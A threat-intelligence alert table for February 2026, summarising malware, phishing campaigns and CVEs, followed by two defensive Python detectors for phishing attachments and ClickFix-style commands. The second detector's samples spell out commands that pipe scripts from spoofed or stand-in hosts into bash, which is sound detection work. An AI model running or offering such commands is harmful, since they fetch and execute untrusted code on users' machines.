ALERTS FEBRUARY 2026
| DATE | NAME | INFO | CATEGORY | SUBCATEGORY |
|---|---|---|---|---|
| 27.2.26 | Steaelite RAT | Steaelite is a newly emerged remote access trojan (RAT) that grants attackers extensive, browser-based command over compromised Windows computers. | VIRUS | |
| 27.2.26 | Open-source payloads spread via malicious npm packages | Tenable researchers recently identified a dangerous npm package named “ambar-src” that underscores the increase in modern supply chain threats targeting the npm landscape. Within just a few days of its release, the package amassed approximately 50,000 downloads before being removed from the public registry. | VIRUS | |
| 27.2.26 | Fake Microsoft 365 Admin Center Loading Screen Stages Iframe-Delivered Credential Phishing | Symantec has observed a credential-phishing campaign using the urgent email subject “Immediate Action Required: Account Lockout [ID: <6-char>-2026]” to pressure recipients into acting quickly. | PHISHING | |
| 27.2.26 | Operation MacroMaze Targets Europe | Operation MacroMaze is a campaign attributed to the Swallowtail threat group (a.k.a. APT28 or Fancy Bear). Over several months, this campaign targeted entities in Central and Western Europe to exfiltrate data. | OPERATION | |
| 27.2.26 | Mercenary Akula Threat Group Targets European Financial Institution with RMM Payload | A report by researchers at BlueVoyant shares insights into recent activity that targeted a European financial institution. The campaign leveraged socially engineered spearphishing and multiple archive files to deliver a legitimate remote administration tool, Remote Manipulator System (RMS). | GROUP | |
| 27.2.26 | UnsolicitedBooker threat group deploys LuciDoor and MarsSnake backdoor variants | The UnsolicitedBooker threat group has recently shifted its crosshairs from Saudi Arabian organizations to telecommunications providers in Kyrgyzstan and Tajikistan. According to a recent Positive Technologies report, the threat actor employs two distinct C++ backdoors called LuciDoor and MarsSnake. | GROUP | |
| 27.2.26 | XMRig delivery campaign leverages BYOVD techniques | Researchers at Trellix have reported an advanced cryptojacking operation that distributes counterfeit software packages to infect computers with an XMRig cryptocurrency miner. Once installed, the malware acts as a complex, multi-stage threat. | CAMPAIGN | |
| 27.2.26 | NetSupport RAT delivery attributed to the GrayCharlie threat actor | GrayCharlie is a financially motivated threat actor that overlaps significantly with the cybercriminal group SmartApeSG. According to a newly published intelligence report by Insikt Group researchers, GrayCharlie specializes in breaching vulnerable WordPress websites and injecting malicious JavaScript into them. | VIRUS | |
| 27.2.26 | Moonrise RAT | Security researchers at ANY.RUN have identified Moonrise, a newly developed Go-based Remote Access Trojan (RAT) built to evade traditional static detection. The malware gives threat actors comprehensive remote control over infected endpoints. | VIRUS | |
| 27.2.26 | Medusa Ransomware distributed by the Lazarus threat group | North Korean state-backed attackers are now using the Medusa ransomware and are continuing to mount extortion attacks on the U.S. healthcare sector. | RANSOM | |
| 27.2.26 | Financial Lures Leveraged to Spread Winos 4.0 to Taiwan | Phishing campaigns delivering Winos 4.0 (ValleyRAT) malware to targets in Taiwan are attributed to the Monarch (aka Silver Fox) threat group. The campaigns leveraged financial lures, specifically tax- and invoice-related documents, to deliver their payloads. | VIRUS | |
| 27.2.26 | PromptSpy Android malware | PromptSpy is a new Android malware variant utilizing generative AI to manipulate user interfaces dynamically. As reported by researchers from ESET, the malware leverages Google’s Gemini AI specifically to maintain a persistent presence on the infected devices. | VIRUS | |
| 23.2.26 | Massiv Android Trojan | Cybersecurity experts from ThreatFabric have identified a new Android banking trojan dubbed Massiv. Massiv operates by granting cybercriminals total remote access to an infected device. | VIRUS | |
| 23.2.26 | New deployment campaign of the CastleLoader and LummaStealer malware | A resurgence in LummaStealer activity has been observed by researchers from Bitdefender. Despite a major law enforcement disruption in May 2025 that neutralized over 2,300 command-and-control domains, the operators appear to be continuing their global attacks. | CAMPAIGN | |
| 23.2.26 | CrescentHarvest cyberespionage campaign | Acronis Threat Research Unit has identified a cyberespionage operation dubbed CrescentHarvest, which aims at surveillance and data theft and is targeted at supporters of ongoing protests in Iran. Observed since early January, the campaign exploits geopolitical tension by using social engineering to trick victims. | CAMPAIGN | |
| 23.2.26 | CVE-2026-1281 and CVE-2026-1340 - Ivanti EPMM RCE Vulnerabilities | In late January, Ivanti released updates to address two critical vulnerabilities affecting Endpoint Manager Mobile (EPMM). Identified as CVE-2026-1281 (CVSS 9.8) and CVE-2026-1340 (CVSS 9.8), these vulnerabilities can allow unauthenticated remote code execution via code injection. Details of active exploitation have been shared in a report by Unit 42 researchers at Palo Alto Networks. | VULNERABILITY | |
| 23.2.26 | Cuckoo infostealer spread via ClickFix techniques | A recent malware delivery campaign discovered by researchers from Hunt.io involves attackers leveraging social engineering and typosquatted domains, specifically ones mimicking the popular Homebrew package manager, to deceive users into executing malicious binaries. | VIRUS | |
| 23.2.26 | An Invitation to Phishing | Calendar invite spam is an increasingly observed tactic used by threat actors to steal credentials. Socially engineered emails designed to entice a recipient to accept a calendar invite direct potential victims to unwittingly share their login information. | PHISHING | |
| 23.2.26 | Interlock Ransomware: Activity Continues Into 2026 | Recent leak-site activity indicates Interlock operations continued into early 2026, with multiple newly listed alleged victims appearing in January–February. This follows a steady cadence of claimed postings in prior years: 67 in 2025 and 14 in 2024. | RANSOM | |
| 23.2.26 | Prometei botnet deployment campaign | Researchers from eSentire's Threat Response Unit recently identified an attempt to deploy the Prometei botnet on a Windows Server in the construction sector. Active since at least 2016, Prometei is a multifaceted malware strain capable of remote control, credential theft, Monero crypto-mining, and lateral network movement. | BOTNET | |
| 16.2.26 | SSHStalker Linux botnet variant | Flare’s research team has identified "SSHStalker," a previously unreported Linux botnet operation. Rather than employing complex modern Command and Control (C2) servers, SSHStalker utilizes a resilient IRC infrastructure to manage various bot variants, including Tsunami and Keiten. | BOTNET | |
| 16.2.26 | Threat Actors Increasingly Integrate GenAI into Active Campaigns | A report by researchers of the Google Threat Intelligence Group highlights recent activity related to artificial intelligence as used by malicious actors. | CAMPAIGN | |
| 16.2.26 | IIS Servers Targeted in Long Term SEO Poisoning Campaigns | China-linked threat actors have been targeting IIS servers in ongoing SEO poisoning campaigns. According to a report by researchers at Elastic, these actors primarily compromise servers in Asian countries to push content directing visitors to illegal gambling or other illicit websites. | CAMPAIGN | |
| 16.2.26 | Japan-Targeted iCloud+ Payment Failure Scam Uses JavaScript-Driven Phishing Kit | A phishing campaign targeting Japanese users abuses a familiar iCloud+ “payment failed” theme to steal Apple Account credentials and, in a second step, harvest payment card details. | SPAM | |
| 12.2.26 | HTM Phishing Across Private and Public Sectors: Targeted Filenames + Telegram Exfil | Over the past few days Symantec has observed a lightweight credential-harvesting campaign that delivers an HTML/HTM attachment directly via email (EMAIL → HTM). The HTM filename pattern (recipient_company_domain_quote.htm) strongly suggests the actor generates lures per target organization. | PHISHING | |
| 12.2.26 | Dating App Masquerade: SpyMax Targets Minglers in France | Android SpyMax has been observed in France, targeting minglers by posing as a dating app (“France Social: Rencontre, Chat”). If downloaded and installed, the app (France social.apk) quickly pivots from “dating” to privilege acquisition, prompting the victim to enable a custom Accessibility Service and grant Device Administrator rights. | VIRUS | |
| 12.2.26 | Guloader is Always Evolving | GuLoader is a sophisticated malware downloader primarily used to deliver Remote Access Trojans and information stealers. Active since 2019, the malware is known for its use of anti-analysis techniques which allow it to conceal its functionality from automated tools and security researchers. | VIRUS | |
| 12.2.26 | NetSupport RAT deployed in latest campaign attributed to the Stan Ghouls threat group | Stan Ghouls threat group (aka Bloody Wolf) has been launching targeted attacks against organizations within Russia, Kyrgyzstan, Kazakhstan, and Uzbekistan since at least 2023. These attacks are characterized by utilizing campaign-specific infrastructure and leveraging custom Java-based malware loaders. | VIRUS | |
| 12.2.26 | PCHunter tool abused by ransomware actors | PCHunter is a Windows system analysis and security tool designed for in-depth inspection and malware removal. It is often used by security professionals for deep detection of malicious activity, including rootkits, hidden processes, and unauthorized kernel drivers. | RANSOM | |
| 12.2.26 | DKnife - an Adversary-in-the-Middle (AitM) framework | DKnife is a sophisticated Adversary-in-the-Middle (AitM) framework designed to monitor gateways and manipulate network traffic. | HACKING | |
| 12.2.26 | CVE-2026-21858 - n8n Workflow vulnerability | CVE-2026-21858 is a recently disclosed critical (CVSS score 10.0) Arbitrary File Read vulnerability affecting n8n, a workflow automation tool. If successfully exploited, the flaw could allow attackers to read files on the underlying server through execution of certain form-based workflows. The vulnerability is patched in version 1.121.0 and newer. | VULNERABILITY | |
| 12.2.26 | From Spreadsheet to Control: How XWorm RAT Infiltrates Systems | XWorm is a well-established, highly modular Remote Access Trojan (RAT). Features available in this RAT include data exfiltration, encrypted C2 communications, full system control, and surveillance. Researchers at Fortinet have published details about recent phishing campaigns attempting to deliver this payload through various financial or business-themed lures. | VIRUS | |
| 12.2.26 | CVE-2025-69200 - phpMyFAQ vulnerability | CVE-2025-69200 is a recently disclosed high severity (CVSS score 7.5) Information Disclosure vulnerability affecting phpMyFAQ, an open-source, database-driven FAQ (Frequently Asked Questions) web application. | VULNERABILITY | |
| 12.2.26 | PowerTool abused by ransomware actors | PowerTool is a Windows security utility used to detect and analyze rootkits, bootkits, hidden processes, and other kernel-level threats. Recent threat intelligence indicates that multiple ransomware operators are abusing PowerTool in an attempt to disable security products. | RANSOM | |
| 12.2.26 | Malicious ClawHub Skills | Researchers from Koi Security have recently audited the ClawHub “skills” marketplace and found 341 malicious skills—most attributed to a coordinated campaign they call “ClawHavoc.” | VIRUS | |
| 12.2.26 | Opportunistic MassLogger campaign: .Z archives and PDF-lookalike executables | Symantec has observed a MassLogger malspam campaign that used routine “business workflow” themes—procurement, invoices, shipping paperwork, and document transmittals—while impersonating two legitimate organizations. | CAMPAIGN | |
| 12.2.26 | CVE-2026-24061 - GNU InetUtils vulnerability | CVE-2026-24061 is a recently disclosed critical (CVSS score 9.8) Argument Injection vulnerability affecting the GNU InetUtils telnetd service in versions 1.9.3 through 2.7. | VULNERABILITY | |
| 9.2.26 |  | CVE-2026-23760 is a recently disclosed critical (CVSS score 9.3) Authentication Bypass vulnerability affecting SmarterTools SmarterMail, an email, groupware and collaboration server designed as an alternative to enterprise collaboration solutions such as Microsoft Exchange. | VULNERABILITY | |
| 9.2.26 |  | Darktrace reports a multi-stage macOS phishing campaign in which a lure email delivers an AppleScript file disguised as a Microsoft document (for example, with a ".docx.scpt" double extension) and depends on a user click to execute. | | |
| 9.2.26 |  | Recent reports exposed a campaign targeting Kazakh and Afghan organizations with the KazakRAT remote access trojan in January 2026. The actors behind it may have been operating since August 2022. | | |
| 9.2.26 | WinRAR CVE-2025-8088 Drives Targeted Espionage in Southeast Asia | Check Point Research ties espionage campaigns in Southeast Asia to a China-nexus actor dubbed Amaranth-Dragon, targeting government and law enforcement. | | |
| 9.2.26 | Billbug Threat Actor Compromised Notepad++ Update Infrastructure | Notepad++, a popular text editor for Windows, was the victim of a supply-chain attack by Chinese state-linked hackers identified as Billbug (aka Lotus Blossom, Spring Dragon). | | |
| 9.2.26 | Recent Black Basta Ransomware Campaign Embeds Vulnerable Driver in Payload | A recent Black Basta attack campaign was notable because the ransomware contained a bring-your-own-vulnerable-driver (BYOVD) defense evasion component embedded within the ransomware payload itself. | | |
| 9.2.26 | Operation Neusploit: Swallowtail Exploits CVE-2026-21509 to Deliver Backdoors | Swallowtail (aka APT28 or Fancy Bear) is a Russian espionage group observed exploiting a recently disclosed Microsoft Office Security Feature Bypass vulnerability, CVE-2026-21509. In a campaign tagged "Operation Neusploit" by researchers at Zscaler, the group distributes specially crafted Office documents in RTF format. | | |
| 9.2.26 | CVE-2026-21509: Microsoft Office Security Feature Bypass Vulnerability | Microsoft has issued an emergency fix for a high-severity Microsoft Office zero-day flaw, tracked as CVE-2026-21509 (CVSS score 7.8). Attackers are reported to be actively exploiting it to bypass security features via malicious documents distributed with social engineering lures that trick users into opening them. | | |
| 9.2.26 |  | Researchers have published a deeper technical breakdown of DynoWiper, a new data-wiping malware used in a December 2025 attack on a Polish energy company's IT systems, expanding on earlier reporting and identifying similarities to the ZOV wiper observed in Ukraine earlier in the year. | | |
| 9.2.26 |  | Infostealers are a commonly observed payload in malware campaigns. They are often distributed through social engineering tactics such as the popular ClickFix method, malvertising, or as fake installers for popular software. A recent Microsoft report highlights this activity, focusing specifically on macOS and Python-based stealers. | | |
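Two of the entries above describe lures that can be caught from the attachment filename alone: the 12.2.26 HTM campaign, whose filenames embed the recipient's organisation (recipient_company_domain_quote.htm), and the 9.2.26 macOS campaign, whose AppleScript payload hides behind a ".docx.scpt" double extension. The following is an added example, not code from this page or from Symantec or Darktrace, showing how a mail-gateway rule could score both patterns. The extension lists, the `Attachment` record and the sample messages are constructed for the example.

```python
import re
from dataclasses import dataclass

# Final extensions that run when opened. Assumption: a short list chosen for this example;
# a production rule would use the gateway's full executable/script extension table.
EXECUTABLE_EXTS = {"scpt", "exe", "js", "jse", "vbs", "hta", "cmd", "bat", "lnk", "scr", "apk"}
# Extensions that make a filename look like an ordinary document ("report.docx.scpt").
DOCUMENT_EXTS = {"docx", "doc", "xlsx", "xls", "pptx", "pdf", "txt"}
HTML_EXTS = {"htm", "html"}
# Tokens too generic to count as "personalised to the recipient".
STOP_TOKENS = {"com", "net", "org", "example", "www", "mail"}


@dataclass
class Attachment:
    recipient: str   # envelope recipient address
    filename: str    # attachment filename as sent


def recipient_tokens(address):
    """Identifiers a per-target lure might embed: local part and domain labels of the recipient."""
    local, _, domain = address.lower().partition("@")
    parts = set(re.split(r"[^a-z0-9]+", local)) | set(re.split(r"[^a-z0-9]+", domain))
    return {p for p in parts if len(p) >= 3 and p not in STOP_TOKENS}


def analyze(att):
    """Return the list of findings for one attachment (empty list = nothing suspicious)."""
    name = att.filename.lower()
    pieces = name.split(".")
    exts = pieces[1:]            # every dot-separated part after the base name
    findings = []

    # Double extension: document-looking inner extension, executable outer extension.
    if len(exts) >= 2 and exts[-1] in EXECUTABLE_EXTS and exts[-2] in DOCUMENT_EXTS:
        findings.append("double-extension")

    if exts and exts[-1] in HTML_EXTS:
        findings.append("html-attachment")
        # Per-target lure: the filename stem contains the recipient's own identifiers.
        stem = ".".join(pieces[:-1])
        words = set(re.split(r"[^a-z0-9]+", stem))
        if words & recipient_tokens(att.recipient):
            findings.append("per-target-html")
    return findings


# Constructed sample messages; none of these names is from the campaigns themselves.
SAMPLES = [
    Attachment("jsmith@acme.example", "jsmith_acme_acme.example_quote.htm"),
    Attachment("bob@contoso.example", "Q1_report.docx.scpt"),
    Attachment("bob@contoso.example", "invoice.pdf"),
    Attachment("bob@contoso.example", "quote.htm"),
]

if __name__ == "__main__":
    for s in SAMPLES:
        print(f"{s.filename!r:45} -> {analyze(s)}")
```

The `per-target-html` signal is the useful one for the Symantec case: a generic HTM attachment is common enough that blocking it outright is noisy, but an HTM whose name contains the recipient's own domain labels is almost never legitimate. The double-extension check intentionally keys on the inner extension being a document type, which is the disguise, rather than on any file with two dots.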
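The 23.2.26 Cuckoo entry and the 9.2.26 infostealer entry both describe ClickFix-style delivery: the victim is talked into pasting an install one-liner that fetches a script from a domain impersonating Homebrew and executes it. The following is an added example, not code from this page or from Hunt.io or Microsoft, of a check that a clipboard or terminal-history monitor could apply to such a command: it detects the "download and execute" shape and then classifies every fetched host against an allowlist, flagging typosquats and trusted-name-as-prefix domains. The allowlist, regexes and sample commands are constructed for the example.

```python
import re
from urllib.parse import urlparse

# Hosts a legitimate installer one-liner is expected to fetch from.
# Assumption for this example; a real deployment maintains its own allowlist.
TRUSTED_HOSTS = {"raw.githubusercontent.com", "github.com", "brew.sh"}

# curl/wget invocation followed by the URL it fetches (stops at a pipe).
FETCH_RE = re.compile(r"\b(?:curl|wget)\b[^|]*?(https?://[^\s\"')]+)")
# Two ways pasted text executes what it downloaded: "... | bash" and bash -c "$(curl ...)".
EXEC_RES = [
    re.compile(r"\|\s*(?:sudo\s+)?(?:/bin/)?(?:ba|z)?sh\b"),
    re.compile(r"(?:ba|z)?sh\s+-c\s+[\"']?\$\("),
]


def edit_distance(a, b):
    """Levenshtein distance, used to spot one- or two-character typosquats."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def classify_host(host):
    """Return (kind, trusted_host): kind is 'trusted', 'prefix_spoof', 'lookalike' or 'unknown'."""
    if host in TRUSTED_HOSTS:
        return "trusted", host
    for trusted in TRUSTED_HOSTS:
        # raw.githubusercontent.com.evil.example: the trusted name is only a leading label sequence.
        if host.startswith(trusted + "."):
            return "prefix_spoof", trusted
    best = min(TRUSTED_HOSTS, key=lambda t: edit_distance(host, t))
    if edit_distance(host, best) <= 2:
        return "lookalike", best
    return "unknown", None


def assess_command(cmd):
    """Flag a pasted command that executes content fetched from an untrusted or spoofed host."""
    remote_exec = any(r.search(cmd) for r in EXEC_RES)
    hosts = {}
    for m in FETCH_RE.finditer(cmd):
        host = (urlparse(m.group(1)).hostname or "").lower()
        hosts[host] = classify_host(host)
    suspicious = remote_exec and any(kind != "trusted" for kind, _ in hosts.values())
    return {"remote_exec": remote_exec, "hosts": hosts, "suspicious": suspicious}


# Constructed sample commands; the spoofed and lookalike domains are invented for the example.
SAMPLES = [
    '/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"',
    "curl -fsSL https://raw.githubusercontent.com.evil.example/install.sh | bash",
    "curl -fsSL https://brevv.sh/install.sh | sudo bash",
    "curl -s https://cdn.example/setup.sh | sh",
    "echo hello",
]

if __name__ == "__main__":
    for cmd in SAMPLES:
        print(assess_command(cmd))
```

The allowlist does the real work; the edit-distance and prefix checks only explain why an untrusted host was chosen, which is what an analyst wants in the alert. Note that `remote_exec` alone is not a verdict: the genuine Homebrew installer has exactly that shape, so the rule only fires when the fetched host is not trusted.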